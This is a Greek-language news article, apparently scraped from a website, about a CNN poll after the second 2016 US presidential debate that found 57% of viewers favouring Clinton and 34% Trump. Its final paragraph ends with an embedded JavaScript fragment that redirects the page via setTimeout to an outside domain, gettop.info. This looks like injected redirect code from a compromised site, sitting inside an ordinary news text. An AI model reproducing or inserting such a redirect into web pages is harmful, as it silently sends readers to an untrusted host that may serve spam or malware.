Σαρώνει η Χίλαρι τον Τραμπ: Κέρδισε το 57% των ψηφοφόρων στο δεύτερο debate

0
5

 

Στο 34% έμεινε ο Τραμπ μετά το δεύτερο debate όπου οι ψηφοφόροι δείχνουν να επιλέγουν τη Χίλαρι Κλίντον ως την καλύτερη επιλογή στην προεδρία των ΗΠΑ.

Όπως σχολιάζει το CNN για λογαριασμό του οποίου διηξήχθη η δημοσκόπηση, εάν ο Ντόναλντ Τραμπ είχε μία τελευταία ελπίδα ν’ αντιστρέψει την αρνητική κατάσταση σχετικά με την προεδρική υποψηφιότητά του και να κερδίσει την εκλογή του στον Λευκό Οίκο, την έχασε χθες το βράδυ, στη δεύτερη τηλεοπτική αναμέτρησή του με τη Χίλαρι Κλίντον.

Η τηλεοπτική παρουσία του ήταν καλύτερη από την πρώτη φορά, ενώ η αντίπαλός του δνε επέβαλε τη δική της παρουσία, όπως το είχε κάνει κατά την πρώτη τηλεοπτική αναμέτρηση.

Οι πολιτικοί αναλυτές επισημαίνουν ότι ο Τραμπ κατέστρεψε κάθε πιθανότητα επικράτησής του μέσα στο πρώτο 20λεπτό και δεν κατόρθωσε να ανακάμψει.

Η δημοσκόπηση του CNN έδειξε ότι ποσοστό 57% των τηλεθεατών σχημάτισαν την εντύπωση ότι επικράτησε η Κλίντον, έναντι ποσοστού 34% που εκτίμησαν ότι τις εντυπώσεις κέρδισε ο εκκεντρικός δισεκατομμυριούχος. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here